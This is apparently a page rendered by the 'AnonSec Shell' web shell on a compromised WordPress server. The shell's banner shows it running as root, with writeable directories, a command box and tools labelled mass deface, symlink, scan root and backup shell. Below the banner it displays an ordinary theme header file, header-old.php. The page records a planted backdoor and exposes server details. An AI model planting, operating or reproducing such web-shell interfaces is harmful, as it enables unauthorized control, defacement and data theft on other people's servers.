AnonSec Shell
Server IP : 104.21.14.48  /  Your IP : 18.119.213.213   [ Reverse IP ]
Web Server : Apache
System : Linux b70eb322-3aee-0c53-7c82-0db91281f2c6.secureserver.net 6.1.90-1.el9.elrepo.x86_64 #1 SMP PREEMPT_DYNAMIC Thu May 2 12:09:22 EDT 2024 x86_64
User : root ( 0)
PHP Version : 8.0.30.2
Disable Function : NONE
Domains : 0 Domains
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/wp-content/themes/mivamerchant/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/wp-content/themes/mivamerchant/header-old.php
<?php
/**
 * The Header for our theme.
 *
 * Displays all of the <head> section and everything up till <div id="main">
 *
 * @package WordPress
 * @subpackage Twenty_Eleven
 * @since Twenty Eleven 1.0
 */
?><!DOCTYPE html>
<!--[if IE 6]>
<html id="ie6" <?php language_attributes(); ?>>
<![endif]-->
<!--[if IE 7]>
<html id="ie7" <?php language_attributes(); ?>>
<![endif]-->
<!--[if IE 8]>
<html id="ie8" <?php language_attributes(); ?>>
<![endif]-->
<!--[if !(IE 6) | !(IE 7) | !(IE 8)  ]><!-->
<html <?php language_attributes(); ?>>
<!--<![endif]-->
<head>
<meta charset="<?php bloginfo( 'charset' ); ?>" />
<meta name="viewport" content="width=device-width" />
<title><?php
	/*
	 * Print the <title> tag based on what is being viewed.
	 */
	global $page, $paged;

	wp_title( '|', true, 'right' );

	// Add the blog name.
	bloginfo( 'name' );

	// Add the blog description for the home/front page.
	$site_description = get_bloginfo( 'description', 'display' );
	if ( $site_description && ( is_home() || is_front_page() ) )
		echo " | $site_description";

	// Add a page number if necessary:
	if ( $paged >= 2 || $page >= 2 )
		echo ' | ' . sprintf( __( 'Page %s', 'twentyeleven' ), max( $paged, $page ) );

	?></title>
<link rel="profile" href="http://gmpg.org/xfn/11" />
<?php $hostname = $_SERVER['SERVER_NAME']; ?>
<link type="text/css" rel="stylesheet" href="http://www.plumbtile.com/mm5/css/00000001/bootstrap.css" media="all" />
<link type="text/css" rel="stylesheet" href="http://www.plumbtile.com/mm5/css/00000001/font-awesome.css" media="all" />
<link type="text/css" rel="stylesheet" href="http://www.plumbtile.com/mm5/css/00000001/style.css" media="all" />
<link type="text/css" rel="stylesheet" href="http://www.plumbtile.com/mm5/css/00000001/default.css" media="all" />
<link type="text/css" rel="stylesheet" href="http://www.plumbtile.com/mm5/css/00000001/smvMiva.css" media="all" />
<link type="text/css" rel="stylesheet" href="http://www.plumbtile.com/mm5/css/00000001/smvMivaBS.css" media="all" />
<link type="text/css" rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.4.0/css/font-awesome.min.css" media="all" />
<link type="text/css" rel="stylesheet" href="http://www.plumbtile.com/mm5/css/00000001/style-header.css" media="all" />
<style type="text/css">#logo a { background-image: url("http://www.plumbtile.com/mm5/graphics/00000001/logo-plumbtile-360x68.gif") } body { background-color: #ffffff }</style>
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<!-- HTML5 Support for IE -->
<!--[if lt IE 9]>
<script src="js/ie8.js"></script>
<![endif]-->
<link href='//fonts.googleapis.com/css?family=Marcellus+SC' rel='stylesheet' type='text/css'>
<link href='//fonts.googleapis.com/css?family=Cabin+Condensed:400,600' rel='stylesheet' type='text/css'>
<link href="//fonts.googleapis.com/css?family=Open+Sans:400,600" rel="stylesheet" />


<script type="text/javascript" src="https://apis.google.com/js/plusone.js"></script>
<link rel="stylesheet" type="text/css" media="all" href="<?php bloginfo( 'stylesheet_url' ); ?>" />
<link rel="pingback" href="<?php bloginfo( 'pingback_url' ); ?>" />
<!--[if lt IE 9]>
<script src="<?php echo get_template_directory_uri(); ?>/js/html5.js" type="text/javascript"></script>
<![endif]-->
<?php
	/* We add some JavaScript to pages with the comment form
	 * to support sites with threaded comments (when in use).
	 */
	if ( is_singular() && get_option( 'thread_comments' ) )
		wp_enqueue_script( 'comment-reply' );

	/* Always have wp_head() just before the closing </head>
	 * tag of your theme, or you will break many plugins, which
	 * generally use this hook to add elements to <head> such
	 * as styles, scripts, and meta tags.
	 */
	wp_head();
?>
<script src="//ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js"></script>
<script type="text/javascript">
	$(document).ready(function(){
		/*var BASKurl = '//' + window.location.hostname + '/mm5/merchant.mvc?Screen=WP-BASKET';
		$.get(BASKurl, function(data) {
			if(data != 0){
				$('#global-mini-basket-container').html(data);
				// console.log (data);
			}
		});*/
		var SIGNurl = '//' + window.location.hostname + '/mm5/merchant.mvc?Screen=WP-SIGNIN';
		$.get(SIGNurl, function(data) {
			if(data != 0){
				$('#wp-signin').html(data);
				// console.log (data);
			}
		});
	});
</script>
<script type="text/javascript">
<!--
function MM_jumpMenu(targ,selObj,restore){ //v3.0
eval(targ+".location='"+selObj.options[selObj.selectedIndex].value+"'");
if (restore) selObj.selectedIndex=0;
}
//-->
</script>
<!-- This chat code must be installed within the body tags -->
<script type="text/javascript">
var lhnAccountN = "26531-1";
var lhnButtonN = -1;
var lhnChatPosition = 'default';
var lhnWindowN = 0;
var lhnDepartmentN = 0;
</script>

</head>

<body <?php body_class(); ?> id="WP">
	<?php echo file_get_contents("http://" . $hostname . "/mm5/merchant.mvc?Screen=WP-HEADER"); ?>

Anon7 - 2022
AnonSec Team